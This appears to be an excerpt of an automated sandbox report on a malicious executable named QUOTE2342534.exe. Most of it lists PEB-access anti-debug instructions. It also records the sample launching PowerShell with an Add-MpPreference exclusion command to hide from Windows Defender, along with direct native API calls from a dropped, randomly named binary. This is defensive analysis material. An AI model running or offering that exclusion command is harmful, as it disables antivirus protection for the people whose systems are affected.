            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171823B mov eax, dword ptr fs:[00000030h]4_2_0171823B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov ecx, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6500 mov eax, dword ptr fs:[00000030h]4_2_017B6500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017225E0 mov eax, dword ptr fs:[00000030h]4_2_017225E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017265D0 mov eax, dword ptr fs:[00000030h]4_2_017265D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E59C mov eax, dword ptr fs:[00000030h]4_2_0175E59C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722582 mov eax, dword ptr fs:[00000030h]4_2_01722582
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722582 mov ecx, dword ptr fs:[00000030h]4_2_01722582
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01754588 mov eax, dword ptr fs:[00000030h]4_2_01754588
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC460 mov ecx, dword ptr fs:[00000030h]4_2_017AC460
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA456 mov eax, dword ptr fs:[00000030h]4_2_017DA456
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171645D mov eax, dword ptr fs:[00000030h]4_2_0171645D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174245A mov eax, dword ptr fs:[00000030h]4_2_0174245A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A430 mov eax, dword ptr fs:[00000030h]4_2_0175A430
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C427 mov eax, dword ptr fs:[00000030h]4_2_0171C427
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017204E5 mov ecx, dword ptr fs:[00000030h]4_2_017204E5
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017544B0 mov ecx, dword ptr fs:[00000030h]4_2_017544B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AA4B0 mov eax, dword ptr fs:[00000030h]4_2_017AA4B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017264AB mov eax, dword ptr fs:[00000030h]4_2_017264AB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA49A mov eax, dword ptr fs:[00000030h]4_2_017DA49A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728770 mov eax, dword ptr fs:[00000030h]4_2_01728770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720750 mov eax, dword ptr fs:[00000030h]4_2_01720750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE75D mov eax, dword ptr fs:[00000030h]4_2_017AE75D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A4755 mov eax, dword ptr fs:[00000030h]4_2_017A4755
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov esi, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov ecx, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179C730 mov eax, dword ptr fs:[00000030h]4_2_0179C730
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720710 mov eax, dword ptr fs:[00000030h]4_2_01720710
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01750710 mov eax, dword ptr fs:[00000030h]4_2_01750710
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C700 mov eax, dword ptr fs:[00000030h]4_2_0175C700
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE7E1 mov eax, dword ptr fs:[00000030h]4_2_017AE7E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172C7C0 mov eax, dword ptr fs:[00000030h]4_2_0172C7C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A07C3 mov eax, dword ptr fs:[00000030h]4_2_017A07C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017207AF mov eax, dword ptr fs:[00000030h]4_2_017207AF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D47A0 mov eax, dword ptr fs:[00000030h]4_2_017D47A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C678E mov eax, dword ptr fs:[00000030h]4_2_017C678E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01752674 mov eax, dword ptr fs:[00000030h]4_2_01752674
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173C640 mov eax, dword ptr fs:[00000030h]4_2_0173C640
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E627 mov eax, dword ptr fs:[00000030h]4_2_0173E627
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01756620 mov eax, dword ptr fs:[00000030h]4_2_01756620
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758620 mov eax, dword ptr fs:[00000030h]4_2_01758620
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172262C mov eax, dword ptr fs:[00000030h]4_2_0172262C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762619 mov eax, dword ptr fs:[00000030h]4_2_01762619
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E609 mov eax, dword ptr fs:[00000030h]4_2_0179E609
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0175A6C7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A6C7 mov eax, dword ptr fs:[00000030h]4_2_0175A6C7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017566B0 mov eax, dword ptr fs:[00000030h]4_2_017566B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C6A6 mov eax, dword ptr fs:[00000030h]4_2_0175C6A6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC97C mov eax, dword ptr fs:[00000030h]4_2_017AC97C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov edx, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0946 mov eax, dword ptr fs:[00000030h]4_2_017A0946
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A892A mov eax, dword ptr fs:[00000030h]4_2_017A892A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B892B mov eax, dword ptr fs:[00000030h]4_2_017B892B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC912 mov eax, dword ptr fs:[00000030h]4_2_017AC912
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE9E0 mov eax, dword ptr fs:[00000030h]4_2_017AE9E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\QUOTE2342534.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\QUOTE2342534.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe NtOpenSection: Direct from: 0x76EF2E0C
